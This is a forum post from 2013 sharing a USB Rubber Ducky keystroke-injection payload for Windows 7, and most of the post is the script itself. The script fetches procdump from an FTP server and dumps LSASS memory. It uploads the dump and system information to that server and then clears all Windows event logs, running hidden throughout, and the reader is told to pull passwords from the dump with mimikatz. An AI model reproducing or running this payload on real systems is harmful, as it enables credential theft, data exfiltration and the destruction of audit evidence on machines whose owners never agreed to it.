waddell Posted August 26, 2013 Posted August 26, 2013 (edited) I'm sure this can be more discrete, and possibly faster, but this was the simplest way to get what I wanted done. Once you have the dmp file, just use mimikatz to find the passwords. Note: Some of this needs to be edited for your FTP server's information (pay attention) You may need to modify this for UAC Thanks to: https://forums.hak5.org/index.php?/topic/29800-payload-duck-slurp-payload/ https://forums.hak5.org/index.php?/topic/30103-payload-exfiltration-via-wifi/ http://www.room362.com/blog/2013/6/7/using-mimikatz-alpha-or-getting-clear-text-passwords-with-a.html REM Payload: FTP LSASS dump for password stealing REM Target: Windows 7 REM Author: Matt Waddell REM Some information taken from other payloads on forums, but this is a nice working utility for dumping passwords to ftp server REM Copies files to target machine and executes it hidden in background so you are very quick with the attack REM There is probably many better ways to do what I am doing, but as a sys admin this is what I needed to prove a point DEFAULT_DELAY 75 DELAY 3000 GUI R DELAY 1000 STRING cmd /Q /D /F:OFF /V:ON /K DELAY 500 ENTER REM *** Some Quick Clean Up (Just In Case) *** REM Will remove any existing files to make scripts work quicker and better STRING if not exist C:\Temp md C:\Temp ENTER STRING erase /Q C:\Temp\procdump.exe ENTER STRING erase /Q C:\Temp\*.dmp ENTER STRING erase /Q C:\Temp\*.txt ENTER STRING erase /Q C:\Temp\*.bat ENTER STRING erase /Q C:\Temp\*.ftp ENTER STRING erase /Q C:\Temp\*.vbs ENTER STRING CD C:\Temp ENTER REM *** ftp_down.txt *** REM Your download settings for grabbing procdump off your ftp server (minimizes need for local storage device) (modify as needed) STRING copy con ftp_down.ftp ENTER STRING USER *********** ENTER STRING *******PASS********* ENTER STRING get procdump.exe C:\Temp\procdump.exe ENTER STRING bye ENTER CONTROL Z ENTER REM *** ftp_up.txt *** REM Your upload settings for putting the lsass dump and some system information settings on your ftp server (modify as needed) STRING copy con ftp_up.ftp ENTER STRING USER *********** ENTER STRING *******PASS********* ENTER STRING put C:\Temp\*.dmp ENTER STRING put C:\Temp\*.txt ENTER STRING bye ENTER CONTROL Z ENTER REM *** ftp_lsass.bat *** REM Runs in background, downloads procdump, dumps passwords, uploads dump and system info, deletes all files, clears logs STRING copy con ftp_lsass.bat ENTER STRING ftp -n -s:C:\Temp\ftp_down.ftp **********server************* ENTER STRING procdump.exe -accepteula -ma lsass.exe C:\Temp\%COMPUTERNAME%_lsass.dmp ENTER STRING systeminfo > C:\Temp\%COMPUTERNAME%_system.txt ENTER STRING ftp -n -s:C:\Temp\ftp_up.ftp **********server************* ENTER STRING erase /Q C:\Temp\procdump.exe ENTER STRING erase /Q C:\Temp\*.dmp ENTER STRING erase /Q C:\Temp\*.txt ENTER STRING erase /Q C:\Temp\*.ftp ENTER STRING erase /Q C:\Temp\*.vbs ENTER STRING for /f %x in ('wevtutil el') do wevtutil cl "%x" ENTER STRING del %0 ENTER STRING exit ENTER CONTROL z ENTER REM *** VBS File for Running Invisibly *** STRING copy con C:\Temp\invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM *** Run Primary Payload and Close Rubber Ducky Cmd Window (can remove ducky when it is closed, everything else is in background) *** STRING wscript.exe C:\Temp\invis.vbs C:\Temp\ftp_lsass.bat && exit ENTER Edited August 26, 2013 by waddell Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.